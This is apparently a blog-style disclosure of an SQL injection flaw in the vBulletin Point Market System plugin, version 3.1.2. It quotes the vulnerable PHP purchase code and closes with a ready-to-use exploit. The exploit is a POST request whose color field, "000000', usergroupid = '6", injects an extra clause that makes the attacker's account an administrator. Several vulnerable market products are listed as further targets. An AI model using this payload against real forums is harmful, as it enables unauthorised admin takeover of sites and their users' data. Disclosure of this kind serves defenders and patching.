vBulletin Point Market System Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=232676
Version: 3.1.2 (latest)

The vulnerability resides in the pointmarket/market_purchase.php file.

One piece of code which is vulnerable, is the following:

// *********** Change User Name Glow *************
    if ($itembuy[marketid] == 15 AND $error == 0) {
        if (!$color) {
            $error = 9; // User did not select a color.
        }
        if ($error == 0) {
            if ($method != 4) {
        	$vbulletin->db->query_read("update " . TABLE_PREFIX . "user set $xperience `$payment`=$ppoints-$amount, market_purchases=market_purchases+1, market_username_glow='$color' where userid='$userid'");
            $vbulletin->db->query_read("insert into " . TABLE_PREFIX . "market_transactions set `expire_date`='$expire', `coupon`='$cid[id]', `date`='$time', marketid='$itembuy[marketid]', mid='$itembuy[mid]',  userid='$userid', affecteduser='$userid', `$pamount`='$amount'");
                // vBExperience Addon
            	if ($payment == "market_xperience") {
            	$vbulletin->db->query_write("update " . TABLE_PREFIX . "xperience_stats set points_xperience=points_xperience-$amount, points_shop=points_shop+$amount where userid='$userid'");
            	}            
            } else {
        	$vbulletin->db->query_read("update " . TABLE_PREFIX . "user set $xperience `$pointfield`=$points-$amount1, `$pointfield2`=$points2-$amount2, market_purchases=market_purchases+1, market_username_glow='$color' where userid='$userid'");
            $vbulletin->db->query_read("insert into " . TABLE_PREFIX . "market_transactions set `expire_date`='$expire', `coupon`='$cid[id]', `date`='$time', marketid='$itembuy[marketid]', mid='$itembuy[mid]',  userid='$userid', affecteduser='$userid', `amount`='$amount', `amount2`='$amount2'");
                // vBExperience Addon
        		if ($pointfield == "market_xperience") {
            	$vbulletin->db->query_write("update " . TABLE_PREFIX . "xperience_stats set points_xperience=points_xperience-$amount1, points_shop=points_shop+$amount1 where userid='$userid'");
            	}
                if ($pointfield2 == "market_xperience") {
            	$vbulletin->db->query_write("update " . TABLE_PREFIX . "xperience_stats set points_xperience=points_xperience-$amount2, points_shop=points_shop+$amount2 where userid='$userid'");
            	} 
            }
        }
    }

As you can see, many variables are not sanitized or checked before being inserted into the database. In this case we can abuse the $color variable. Since UPDATE statements are used, we can change the usergroup of our account to administrator and gain access to the admin control panel.

Note that in order to exploit this, you need access to the market and access to certain products in the market.

The following products, which you can buy in the market of this plugin, are vulnerable:
Change User Title Color, Change User Title Glow, Change User Name Color, Change User Name Glow, Post Font Face, Post Font Color, Thread Color.

Simply go to the product page and use any developer tool to change the value of the color/face POST value.

POST to: 	http://example.com/market.php?do=purchase
POST data:	payment1: 1
		item_id: 15
		color: 000000', usergroupid = '6
		securitytoken: yoursecuritytoken

Change the usergroupid to the usergroupid of the administrator usergroup, which is usually 6.

Leave a Reply

Your email address will not be published / Required fields are marked *